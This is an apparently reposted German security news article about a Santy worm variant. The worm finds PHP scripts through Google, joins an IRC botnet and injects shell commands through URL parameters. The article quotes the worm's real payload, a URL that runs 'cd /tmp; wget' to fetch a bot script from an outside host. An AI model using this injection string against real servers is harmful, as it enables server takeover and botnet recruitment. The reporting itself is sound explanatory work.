Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Ratings

There are no comments available yet.

Here you can write a comment


Please enter at least 10 characters.
Loading... Please wait.
* Pflichtangabe

Related topics

SSH-Client PuTTY mit Trojaner

Die Entwickler der freien Telnet- und SSH-Implementierung PuTTY für Windows und Unix warnen, dass eine Version ihrer Software, die bei CNet zum Download angeboten wurde, diverse Spyware installiert. Betroffen war PuTTY 0.56, das unter download.com für run ...

admin

Autor : admin
Category: Software & Web-Development

QSC - verbilligt DSL-Flat für Studenten

Der Q-DSL-Zugang von QSC zum Preis von derzeit 59 Euro (115,40 DM) wird jetzt noch billiger. Studenten erhalten die DSL-Flatrate jetzt zum Preis von 51 Euro (99,75 DM). QSC stellt wie bisher einen 1024 kbps Downstream und 128 kbps Upstream bereit. Fü ...

admin

Autor : admin
Category: Software & Web-Development

GMX Viren-Report

Aktuelle Virenwarnungen 15.01. Troj/Mmdload-A 15.01. W32/Rirc-A 14.01. Troj/Inor-B 12.01. W32/Randex-Y 09.01. Troj/Dloader-L Viren - TOP 5 W32/Sober-C W32/Mimail-K W32/Dumaru-A W32/Mimail-J W32/Mimail-C Quelle: Sophos "Sie dro ...

admin

Autor : admin
Category: Software & Web-Development

W3C legt Vorschläge für SVG- und SMIL-Animation vor

Das W3C hat jetzt die Scalable Vector Graphics (SVG 1.0) Spezifikation und SMIL Animation (Synchronized Multimedia Integration Language) als "Proposed Recommendation" vorgelegt. Damit nähern sich beide nun einem offiziellen W3C-Standard, der "Recommendati ...

admin

Autor : admin
Category: Software & Web-Development

Strato-Domains möglicherweise wegen Angriff offline

Viele der von Strato gehosteten Domains sind immer noch offline. Wer versucht, per Telnet zuzugreifen, erhält die Meldung "Welcome to the New World Order". ...

admin

Autor : admin
Category: Software & Web-Development

PHP 5.0 kommt

Seit gestern, dem 29.06.03 ist der erste Beta Release von PHP 5.0 zum Download freigegeben. PHP 5 wird die Zend Engine 2 unterstützen, der XML Support wurde komplett erneuert und SQLite kommt nun zusammen mit PHP. Weitere Neuheiten finden Sie auf der S ...

admin

Autor : admin
Category: Software & Web-Development

Wir entwickeln seit über 20 Jahren Web & E-Commerce Anwendungen
Egelsbach, Deutschland

Publish a press release

Share your news and information

Share your news and information with others

You want to inform other users about an interesting IT topic, then sign up now and share it with our PHP community

learn more

Publish a press release